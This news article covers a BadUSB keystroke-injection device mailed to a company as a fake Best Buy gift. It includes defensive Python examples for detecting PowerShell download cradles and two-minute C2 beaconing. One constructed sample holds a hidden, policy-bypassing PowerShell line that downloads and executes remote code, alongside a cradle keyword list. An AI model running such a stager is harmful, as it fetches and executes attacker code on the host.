BadUSB Stick Mailed to Company From ‘Best Buy’


Security experts have intercepted a highly targeted attack in which a malicious USB device was mailed out to a US company.

Trustwave was alerted to the attempted attack on a partner of one of its customers, after that partner received an unsolicited letter in the post purporting to come from Best Buy.

A brief message thanked the company for being a loyal customer and enclosed a ‘$50 gift card’ alongside the USB, which the sender claimed contained a list of the items the gift balance could be spent on.

In fact, the device was a “BadUSB”: its firmware had been reprogrammed so that it presents itself to the PC as a USB keyboard and automatically types out (injects) malicious commands as soon as it is connected, without the user opening anything.

On analysis, Trustwave discovered that the injected keystrokes launched a PowerShell payload designed to download second-stage PowerShell code from the internet, which in turn executed malicious JScript.
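The sequence above (a keyboard-class USB device arrives, and within seconds PowerShell launches with a download cradle) is the most reliable host-side signal for this kind of attack. The detection below is an added example, not code from Trustwave or the article: it correlates simplified, constructed Windows Security records (event 6416 "new external device recognized" and 4688 "process creation"; the one-line field layout and host names are assumptions, not real telemetry) and decodes any `-EncodedCommand` argument before checking it for cradle indicators, since encoded stagers are the norm.

```python
"""Added example (not from the Trustwave write-up or the article): flag a
PowerShell download cradle launched within seconds of a new USB HID
(keyboard-class) device arriving on the same host.

Event records below are constructed and simplified, not real Windows telemetry.
"""
import base64
import re
from datetime import datetime, timedelta

HID_WINDOW = timedelta(seconds=60)   # keystroke injection fires right after plug-in
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                  "net.webclient", "invoke-webrequest")

# Constructed stage-1 command. PowerShell's -EncodedCommand takes base64 of UTF-16LE text,
# so the sample encodes it the same way; the URL is a placeholder, not a real indicator.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()

# Constructed sample log: "<timestamp> <host> <event id> <key=value detail...>"
SAMPLE_LOG = f"""\
2020-03-10T09:14:02 WS-042 6416 ClassName=HIDClass DeviceDescription=USB Input Device
2020-03-10T09:14:09 WS-042 4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -w hidden -ep bypass -enc {_ENC}
2020-03-10T09:30:15 WS-017 6416 ClassName=USB DeviceDescription=USB Mass Storage Device
2020-03-10T09:31:00 WS-017 4688 NewProcessName=C:\\Windows\\explorer.exe CommandLine=explorer E:\\
2020-03-10T10:02:44 WS-099 4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -File C:\\scripts\\backup.ps1
"""


def parse(line):
    """Split one constructed record into (timestamp, host, event id, detail)."""
    ts, host, event_id, detail = line.split(maxsplit=3)
    return datetime.fromisoformat(ts), host, int(event_id), detail


def decoded_command_line(detail):
    """Return the CommandLine field, with any -e/-ec/-enc/-EncodedCommand
    payload decoded from base64 UTF-16LE and appended for inspection."""
    cmd = detail.split("CommandLine=", 1)[1] if "CommandLine=" in detail else ""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if m:
        try:
            cmd += " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
        except ValueError:
            pass   # malformed base64: fall through and match on the raw text
    return cmd


def detect(log_text, window=HID_WINDOW):
    """Alert on powershell.exe with cradle indicators started within `window`
    after a HID-class device arrived on the same host."""
    last_hid = {}          # host -> timestamp of most recent HID-class device arrival
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, eid, detail = parse(line)
        if eid == 6416 and "ClassName=HIDClass" in detail:
            last_hid[host] = ts
        elif eid == 4688 and "powershell.exe" in detail.lower():
            hid_ts = last_hid.get(host)
            if hid_ts is None or not (timedelta(0) <= ts - hid_ts <= window):
                continue   # no recent keyboard-class device on this host
            cmd = decoded_command_line(detail).lower()
            hits = [marker for marker in CRADLE_MARKERS if marker in cmd]
            if hits:
                alerts.append({
                    "host": host,
                    "time": ts.isoformat(),
                    "seconds_after_hid": int((ts - hid_ts).total_seconds()),
                    "indicators": hits,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Only WS-042 trips the rule: WS-017's device is mass storage, not HID, and WS-099's PowerShell is a scheduled script with no cradle indicators and no preceding device arrival. In production the same join is done in the SIEM, and the HID half of it needs "Audit PNP Activity" enabled for 6416 to be logged at all.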

“The JScript code could be anything, but when we decoded it, it revealed code that gathers system information from the infected host,” the vendor explained.

Information including username, hostname, domain name, computer model, running processes, Office and Adobe Acrobat installations and OS details is encoded and sent back to the command-and-control (C&C) server.

“The main JScript code [then] enters an infinite loop sleeping for two minutes in each loop iteration then getting a new command from the command and control,” said Trustwave.
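A sleep-then-poll loop with a fixed two-minute interval leaves a very regular pattern in egress logs, which is the network-side signal for this implant. The following is an added example, not Trustwave's analysis code: it groups constructed, simplified proxy records (host, destination, method, path; the addresses are documentation ranges and the hosts are assumptions) by source and destination, and flags pairs whose inter-request intervals cluster tightly around one period. It uses the median interval so that the one-off stage-2 download that precedes the beaconing does not mask it.

```python
"""Added example (not from the Trustwave write-up or the article): find
fixed-interval beaconing, such as a two-minute sleep-and-poll loop, in
outbound proxy records. Log lines are constructed, not real telemetry.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample: "<timestamp> <source host> <destination> <method> <path>".
# WS-042 fetches a second stage once, then polls every ~120 s with a second or two
# of clock jitter; WS-017 is ordinary browsing with irregular gaps.
SAMPLE_PROXY_LOG = """\
2020-03-10T09:14:20 WS-042 203.0.113.7:80 GET /s2.ps1
2020-03-10T09:15:00 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:17:01 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:19:00 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:21:02 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:23:00 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:25:01 WS-042 203.0.113.7:80 POST /gate
2020-03-10T09:14:33 WS-017 198.51.100.20:443 GET /news
2020-03-10T09:16:05 WS-017 198.51.100.20:443 GET /news/item1
2020-03-10T09:22:47 WS-017 198.51.100.20:443 GET /news/item9
2020-03-10T09:40:12 WS-017 198.51.100.20:443 GET /sports
2020-03-10T09:41:00 WS-017 203.0.113.7:80 GET /
"""


def intervals_by_pair(log_text):
    """Map (source, destination) -> sorted list of seconds between consecutive requests."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _method, _path = line.split()
        times[(src, dst)].append(datetime.fromisoformat(ts))
    result = {}
    for pair, stamps in times.items():
        stamps.sort()
        result[pair] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return result


def find_beacons(log_text, min_intervals=5, tolerance=0.10, min_regularity=0.8):
    """Flag (source, destination) pairs with at least `min_intervals` gaps where
    `min_regularity` of the gaps fall within +/-`tolerance` of the median gap.
    The median, unlike the mean, is not dragged off by an initial download or
    a single missed poll."""
    beacons = []
    for (src, dst), gaps in intervals_by_pair(log_text).items():
        if len(gaps) < min_intervals:
            continue
        period = median(gaps)
        if period <= 0:
            continue
        regular = sum(abs(g - period) <= tolerance * period for g in gaps) / len(gaps)
        if regular >= min_regularity:
            beacons.append({"src": src, "dst": dst,
                            "period_s": period, "regularity": regular})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_PROXY_LOG):
        print(beacon)
```

Only WS-042 to 203.0.113.7:80 is flagged, with a 120-second period and five of six gaps on that period (the sixth is the initial stage download). Real implants often add jitter to the sleep; widening `tolerance` and lengthening the observation window is the usual trade-off against false positives from legitimate pollers such as update checkers, which should be allow-listed by destination rather than by loosening the rule.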

It is unclear what the attackers’ end goal was, but while USB keystroke-injection devices of this kind are a staple of penetration testers’ toolkits, they are rarely seen in real attacks, the vendor concluded.

“These types of USB devices are widely known and used by security professionals. The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals in the wild,” it explained.

“Since USB devices are ubiquitous, used and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it's that one should never trust such a device.”
